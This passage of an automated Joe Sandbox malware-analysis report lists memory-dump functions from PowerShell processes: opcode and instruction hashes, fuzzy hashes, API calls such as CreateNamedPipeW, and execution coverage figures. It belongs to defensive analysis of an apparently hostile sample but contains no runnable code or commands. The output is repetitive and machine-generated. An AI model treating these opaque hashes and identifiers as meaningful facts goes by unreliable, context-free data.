                                                        • Instruction Fuzzy Hash: 332113B5C006199BCB10CFAAD844BDEFBF8FB48724F10862AD919A3240D734A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (basic blocks and edges recovered from the rendered graph; executed/not-executed colouring is not recoverable in text)

                                                        • 213: 4a63f9c-4a64e3a
                                                        • 217: 4a64e42-4a64e6d GetFileAttributesW
                                                        • 218: 4a64e3c-4a64e3f
                                                        • 219: 4a64e76-4a64e93
                                                        • 220: 4a64e6f-4a64e75
                                                        • Edges: 213->217, 213->218, 217->219, 217->220, 218->217, 220->219
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 04A64E60
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340699591.0000000004A60000.00000040.00000001.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 8f52c01b718241794dda531841817de45682242ffe39004e9e80898efa116d55
                                                        • Instruction ID: 3410ab4ec75635ac5f181ad5e876c9cc5e59f7132f152f7815050f1a06d97b45
                                                        • Opcode Fuzzy Hash: 8f52c01b718241794dda531841817de45682242ffe39004e9e80898efa116d55
                                                        • Instruction Fuzzy Hash: 5E2144B0D006199BCB10CFAAD4447DEFBF4FB48720F10812AD919B3240D734A900CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf3a4ec1528ef2b95e9653fdcaeb106062477f46f04eef4aa59947a988d029bc
                                                        • Instruction ID: 68b0a58e2a1d5aed474db1490e5da31bde848cdd080f40b4808bf8b3fd88d8db
                                                        • Opcode Fuzzy Hash: bf3a4ec1528ef2b95e9653fdcaeb106062477f46f04eef4aa59947a988d029bc
                                                        • Instruction Fuzzy Hash: 63A130753012005FDB249BB89458BAA3BEAEFC8318F14896DD94ACB381DF34DC46C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b00da9b6d9c66d41787e728469072226fd98c5dcf976d2b9f21e123f546d4430
                                                        • Instruction ID: a93fae4978836fc0f363c50e6934b3a8848901109ae374e80b2bd550dd6f8a37
                                                        • Opcode Fuzzy Hash: b00da9b6d9c66d41787e728469072226fd98c5dcf976d2b9f21e123f546d4430
                                                        • Instruction Fuzzy Hash: 56B1E3B5A01219CFCB14DFA8C494A9DBBF2BF88304F148569E909AB365DB70AD41CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0afcf4041d9581a012037a680ed15f208191cedbe52d3edec102d94b4355c4b8
                                                        • Instruction ID: fd16de03f469a74facd8bc726c72d416f2c2941896ae1120775c86f6fdc837b6
                                                        • Opcode Fuzzy Hash: 0afcf4041d9581a012037a680ed15f208191cedbe52d3edec102d94b4355c4b8
                                                        • Instruction Fuzzy Hash: 8C719174A012059FDB149FA8D8547AE7BFAEFC8304F148929E505DB3A0DF75AC41CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c158c61a8446e155e3965cf53de69bc2cf7163a2d50c185d4ca445f8d72fb330
                                                        • Instruction ID: 8ea48750b0f60c029c9380a4dc42913d7ca3bf69881c5416857a4c03a5ed4ce0
                                                        • Opcode Fuzzy Hash: c158c61a8446e155e3965cf53de69bc2cf7163a2d50c185d4ca445f8d72fb330
                                                        • Instruction Fuzzy Hash: CB7133B1B052158FCB159F2CD4906AEFBE6EF89314F14856AD885DB341DB70DC82CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e12c61f3282cb96000612fb2a75d578add25b60a3ced93f305e0b8182864eb09
                                                        • Instruction ID: ba387d0ea0b5e09b4bcdcbdefed875ad6e50e972f4c21045084fb03c6231c62e
                                                        • Opcode Fuzzy Hash: e12c61f3282cb96000612fb2a75d578add25b60a3ced93f305e0b8182864eb09
                                                        • Instruction Fuzzy Hash: 43911474A01214DFDB28EF34D994B9DB7B2EF88205F5084ADD50AAB351DB35AD81CF21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a55500bfe265fa91164fe76e4e8ca883cb0710b3529b9e68d7c32b3f74901d4
                                                        • Instruction ID: 2620e6ce7162822f7f71887a4e9f19a1d5c67d5ba3b443d5a11c4a6a71ab23e3
                                                        • Opcode Fuzzy Hash: 5a55500bfe265fa91164fe76e4e8ca883cb0710b3529b9e68d7c32b3f74901d4
                                                        • Instruction Fuzzy Hash: 91519175A01205EFCB14DFA8D844B9DBBF6FF88314F148529E415AB2A0DB759C45CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04257319c8d5c172e3ac6e2ef866e21f351268523435dad17b48d7344c56dee9
                                                        • Instruction ID: cf05fd1f13aa0d06e6f81c76240096a173a39395c3481cf3b21453a80a0be4a8
                                                        • Opcode Fuzzy Hash: 04257319c8d5c172e3ac6e2ef866e21f351268523435dad17b48d7344c56dee9
                                                        • Instruction Fuzzy Hash: 831170B46052458FCB14CF58C890AAEF771FF44324F25869AD525DB3E2C736AC82CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340185194.00000000048DD000.00000040.00000001.sdmp, Offset: 048DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_48dd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f11f5ba154a51b38e2daab0244f35902a67a6c1c68253a0f533c2e462174c05
                                                        • Instruction ID: 6a31319939894306f52f6e5fb46d36c254cb474652e9df3cbc1b6f751ff00c04
                                                        • Opcode Fuzzy Hash: 5f11f5ba154a51b38e2daab0244f35902a67a6c1c68253a0f533c2e462174c05
                                                        • Instruction Fuzzy Hash: D501F771505344AFD7209E65EC84BA7BBCCEFC1368F18CA1AED059B282D379AC45C6B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.340185194.00000000048DD000.00000040.00000001.sdmp, Offset: 048DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_48dd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 62f028ac0d57484ffe23b3d43756004d771ebbaad82aeaa882c04b11d8cbdab0
                                                        • Instruction ID: 44f8c33f72db985f5150d9e3e4f6f33e3ee968914121fd1028975f49a31a8466
                                                        • Opcode Fuzzy Hash: 62f028ac0d57484ffe23b3d43756004d771ebbaad82aeaa882c04b11d8cbdab0
                                                        • Instruction Fuzzy Hash: BF015E6140E3C05FD7128B259C94B96BFA4EF53224F18C5DBE9848F293C2695C49C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0366cc4084810ad46b3266eec4db148e2536a64126212bf2bb70485c76630c7
                                                        • Instruction ID: 7d12bdd62d3f979ef87ad0c5ab6b1ed7d16edc104a897dd0c0028d46abb8f837
                                                        • Opcode Fuzzy Hash: f0366cc4084810ad46b3266eec4db148e2536a64126212bf2bb70485c76630c7
                                                        • Instruction Fuzzy Hash: F1F096B6205514EF9B14DB55D845CABFBF9EF89260300805AF64987711CA71AD00C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ee8ec12860aaa7739be7d0ebb6595b227f05e3b33086a00cf937748cf8d937c
                                                        • Instruction ID: c18a84f80a43f242672ff6d72a7c332b5e3bf50bb533073082b8da0a1d7eb2a0
                                                        • Opcode Fuzzy Hash: 0ee8ec12860aaa7739be7d0ebb6595b227f05e3b33086a00cf937748cf8d937c
                                                        • Instruction Fuzzy Hash: 1101A971900228DFCB44CFA9C80489EFBF0FF8D220B00816AE909E3340E730A901CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4888da3447771c562b7502f2c6b8943e9d374295d85ceb392fc405dcc6f2c695
                                                        • Instruction ID: 890889dd9b575651f3fcde493738e34e92cc91af6c8769070615765ae17a6e4f
                                                        • Opcode Fuzzy Hash: 4888da3447771c562b7502f2c6b8943e9d374295d85ceb392fc405dcc6f2c695
                                                        • Instruction Fuzzy Hash: 29F01475900228DFCB54DFA9C84489EFBF5FF8D211B1084AAE909E7310E735AA11CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 057e72265fa1659fb9de1d4697c1847f23b07ae9227ae5a28e4753a58c30f14e
                                                        • Instruction ID: cb7544545bb53308fa32202770165655c5b912dbc7223019620b0181bbab5362
                                                        • Opcode Fuzzy Hash: 057e72265fa1659fb9de1d4697c1847f23b07ae9227ae5a28e4753a58c30f14e
                                                        • Instruction Fuzzy Hash: 6BF0A076200618BF9714DB45EC44CABBBFDFB8D260300811AF60983710CB72AC01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e90e1edd04c76aec9bf125c8bd8b415ba77de35660c50ef0c341fb3a6b287c6
                                                        • Instruction ID: f66d87586d2b13f4ff12e41078f8df7a0c48bb7ce0e1af6075777dab020f0d01
                                                        • Opcode Fuzzy Hash: 7e90e1edd04c76aec9bf125c8bd8b415ba77de35660c50ef0c341fb3a6b287c6
                                                        • Instruction Fuzzy Hash: CDF0A737505119BF9F05DF55AC04CEF7FAADF882707004126F51882250DA3149219BB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40221a55f3ae26f0e477b7fdb06ac4382263ac6eed3b9b32c6b6092074b86aea
                                                        • Instruction ID: dbe952968183634e39bc845c35b4859b04230ef9a4d1d8456228173d3a23be10
                                                        • Opcode Fuzzy Hash: 40221a55f3ae26f0e477b7fdb06ac4382263ac6eed3b9b32c6b6092074b86aea
                                                        • Instruction Fuzzy Hash: 92F03076204618AF9714DB45E844C6BBBFDFB8D660300841AF64987710DB72AD11DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1deab2bca22269b06151659de5bb1a34a0a45835073f1d3ffa310acd13b9a1fc
                                                        • Instruction ID: e94687ec20922e40982676d7e3991c328a4ccf6cf66d89334d225a2757d802a1
                                                        • Opcode Fuzzy Hash: 1deab2bca22269b06151659de5bb1a34a0a45835073f1d3ffa310acd13b9a1fc
                                                        • Instruction Fuzzy Hash: 7CE0123760011DBF8F05DE96AC04CEF7FAEEB882617048026FA18C2210DA3189219BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e35f42d08e4ad2b1ac2973d2dbefe17d1664dcb6897dfaf96c431140e794cb23
                                                        • Instruction ID: af749009b624d19c666a6e3f778a6a222759554d73c491f1c3c8a44929f585a4
                                                        • Opcode Fuzzy Hash: e35f42d08e4ad2b1ac2973d2dbefe17d1664dcb6897dfaf96c431140e794cb23
                                                        • Instruction Fuzzy Hash: 3CD02B30741011EF820076AC98448AF3B89CFC75183800468F101EBB50CE95FC0043CA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a68cbe85b618077c9dc57c4a5a719c1152e9876c0f077e16fd3472ecb280743
                                                        • Instruction ID: 193b1b5f7e9040268c2eb03cf0b969705dfdd8aad6fabe74018c44081f1e45d0
                                                        • Opcode Fuzzy Hash: 6a68cbe85b618077c9dc57c4a5a719c1152e9876c0f077e16fd3472ecb280743
                                                        • Instruction Fuzzy Hash: 73D05E31741150AB86207AFDA8458AE3799CFC65747800669E516EBBE1CEAAEC0007E7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8e5d6e5b0bbab08df1af46c209730e6993d35d623625b6791f6218e4fd9dcb3
                                                        • Instruction ID: ee58c4f76f07455c00a1d69a14ba5525781d4d4e4d4194f9f4fae7c1375ca807
                                                        • Opcode Fuzzy Hash: c8e5d6e5b0bbab08df1af46c209730e6993d35d623625b6791f6218e4fd9dcb3
                                                        • Instruction Fuzzy Hash: F4D0A731740110EBC60076FCE8444AD37D9CFC65147800069E106DFB60CEAAFC0007D7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $Xcml$Xcml$Xcml
                                                        • API String ID: 0-307529478
                                                        • Opcode ID: f7904846a1b385deda881ba5b1d970c44db36106b6aca326b783603bafe5e481
                                                        • Instruction ID: 74f5c2047dad8faa9ef59b43517789a2b435e42d9c7f436eeb1af480c5bd371f
                                                        • Opcode Fuzzy Hash: f7904846a1b385deda881ba5b1d970c44db36106b6aca326b783603bafe5e481
                                                        • Instruction Fuzzy Hash: AE127AB1B012158FDB24DBB9C858AAEB7F6AF89308F158469D506EB350EF34DC81CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ca428a1a5a74efd1e57082fa8cccdc49780a9910b40f13eb2b61a262e89686a6
                                                        • Instruction ID: b7c77c4f0c7e93415baaf0a2e33f2bd7e13579db9c9a136729b967729795b728
                                                        • Opcode Fuzzy Hash: ca428a1a5a74efd1e57082fa8cccdc49780a9910b40f13eb2b61a262e89686a6
                                                        • Instruction Fuzzy Hash: E0433C74A002298FEB65EB60CC507AE77B7EFC9308F2085A895096B759CF759D81CF42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xcml
                                                        • API String ID: 0-4047222193
                                                        • Opcode ID: a07fd4441d3216e923bf3c9f20ad9e4163b62565f8956a78ed18b891ceffecae
                                                        • Instruction ID: 410bec0cab8cc93bd8ad7d6f0ff4d1d2998ab5ff7af7b5bf47e7d3ab3e36798d
                                                        • Opcode Fuzzy Hash: a07fd4441d3216e923bf3c9f20ad9e4163b62565f8956a78ed18b891ceffecae
                                                        • Instruction Fuzzy Hash: 9D916EB0A012159FDB24DFA8C858AADBBF6EF89304F158569D406EB351DF34DC41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4bfe8105e2eab7ae5a85f6c3ed130fb0205966528ed4ad7a07a2d626fc3d9a0
                                                        • Instruction ID: 4c2884a952dc99d70e28dec4c19583432ad80f239c023f4b1ba0bf4caf68992e
                                                        • Opcode Fuzzy Hash: f4bfe8105e2eab7ae5a85f6c3ed130fb0205966528ed4ad7a07a2d626fc3d9a0
                                                        • Instruction Fuzzy Hash: A4D1C3B5B012059FDB14EBB4D8509AEB7E7EFC8214B158939D906EB384DF349C02CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 97b5f50b510225bd1d32dd0abbae2a3efe1bcefd8d7b9666de82a0cfa4482ce9
                                                        • Instruction ID: 9e8ec1affaf5ce019252a99779aacd846f0f41267d68f5ab093ca54eeb30e0c9
                                                        • Opcode Fuzzy Hash: 97b5f50b510225bd1d32dd0abbae2a3efe1bcefd8d7b9666de82a0cfa4482ce9
                                                        • Instruction Fuzzy Hash: A8E1E1B1B012069FDB14DBA4C850ABEB7F6AFC9204F159469D902AB395DB34EC41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d73afd4fe6e9064451673f507cb98a4a49d92d23fcb1d8219a6fd10cf08151f5
                                                        • Instruction ID: 16abd16a4ea3a9d0c35f277c71d42d1ba758b59912115f53649d365b3fd0a7f7
                                                        • Opcode Fuzzy Hash: d73afd4fe6e9064451673f507cb98a4a49d92d23fcb1d8219a6fd10cf08151f5
                                                        • Instruction Fuzzy Hash: 3EB1BE717016069FDB14DF78C884AAAB7E6EF85218F14C869E505CF241EB34ED46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 12a161f0d9b43bcfe2c783e4b0412e3c117194f2a9e28a455af24bc2ff8aa225
                                                        • Instruction ID: c0785a23472ca0732ecc262611ddfdf931c0c654650a253735072ec6fe301793
                                                        • Opcode Fuzzy Hash: 12a161f0d9b43bcfe2c783e4b0412e3c117194f2a9e28a455af24bc2ff8aa225
                                                        • Instruction Fuzzy Hash: 078191B0B013029FDB24DBB48855ABBB3E6AFC5218F158968D5069B385DF34EC41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.347936719.0000000007E70000.00000040.00000010.sdmp, Offset: 07E70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e70000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8^ml$dlml$dlml$dlml$dlml$dlml$dlml$dlml
                                                        • API String ID: 0-1648173814
                                                        • Opcode ID: e5395c7e6e6a729981a8e91e13f838e23c92c41b60bf677f7ef71b302008daab
                                                        • Instruction ID: 35c2bf782fe71bfe76d4e1edec8e828efab352f4cb9caba24b9d3d0e4fbb8f9b
                                                        • Opcode Fuzzy Hash: e5395c7e6e6a729981a8e91e13f838e23c92c41b60bf677f7ef71b302008daab
                                                        • Instruction Fuzzy Hash: 2A128170A12609DFCB14DFA4D444AADB7F2FF85319F109928E4069B3A0EB75EC85CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage: 5.8%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 13.6%
                                                        Total number of Nodes: 22
                                                        Total number of Limit Nodes: 1

                                                        Graph


                                                        Executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: db9d27f22da4205674b1c9f916110008fb436788e96adf074e526d77e6ff987f
                                                        • Instruction ID: d322bf5c148156ee060e1332ac552d15ce7c741de471a915c48ec3a0d2c4a41e
                                                        • Opcode Fuzzy Hash: db9d27f22da4205674b1c9f916110008fb436788e96adf074e526d77e6ff987f
                                                        • Instruction Fuzzy Hash: CE63E5B4A00219DFDB64DF24D855BA9BBB2FF89305F1080A9E40AA7750DF399E81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 080D5980
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431476098.00000000080D0000.00000040.00000001.sdmp, Offset: 080D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_80d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateNamedPipe
                                                        • String ID:
                                                        • API String ID: 2489174969-0
                                                        • Opcode ID: 1f84e1367ec722062a954f4ea425d8a910c35a20cb45abc728f521dd5876960f
                                                        • Instruction ID: 2ec41e9f6892dfa6189ef3665c6e24519eafa10a603d59ebde76eaba6a1f13a6
                                                        • Opcode Fuzzy Hash: 1f84e1367ec722062a954f4ea425d8a910c35a20cb45abc728f521dd5876960f
                                                        • Instruction Fuzzy Hash: 9051F3B0D013489FDB14CFA9D884B8EFBF6AF48314F24852AE818AB260D7759944CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1efecb34f757ce6ebf275ea3f22a51f9653e4a276719e5a1188985c38a6e785b
                                                        • Instruction ID: b40426bad57ccc1a44ba448b3a2adf24059e6a37d21a7239edbe72f0044f20e6
                                                        • Opcode Fuzzy Hash: 1efecb34f757ce6ebf275ea3f22a51f9653e4a276719e5a1188985c38a6e785b
                                                        • Instruction Fuzzy Hash: BAB207B4A01329CFDB64DF24D848B99B7B2BF89305F1084E9E40AA7790DB359E85CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7032901d414ae1a7899c38fb4e2a3fa71f82e0c6d16b36c8fa5274e83fad140b
                                                        • Instruction ID: 37f991689eae65e825b51ad327970e81eb046fca54d14ea3afbaf2353f44a684
                                                        • Opcode Fuzzy Hash: 7032901d414ae1a7899c38fb4e2a3fa71f82e0c6d16b36c8fa5274e83fad140b
                                                        • Instruction Fuzzy Hash: FF527B70A00219DFDF14DF64C844BEEB7F6AF89304F1485A9E909AB260DB74ED81CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
